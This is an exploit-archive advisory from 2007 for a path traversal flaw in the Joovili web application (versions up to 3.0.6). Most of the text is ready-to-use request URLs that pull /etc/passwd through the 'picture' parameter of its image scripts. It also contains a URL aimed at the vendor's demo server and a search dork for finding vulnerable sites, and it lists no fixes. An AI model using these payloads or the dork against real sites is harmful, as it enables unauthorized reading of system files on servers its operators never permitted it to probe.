Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability

2007-12-27 00:00:00

found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE


demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili

#

Fixes

No fixes

In order to submit a new fix you need to be registered.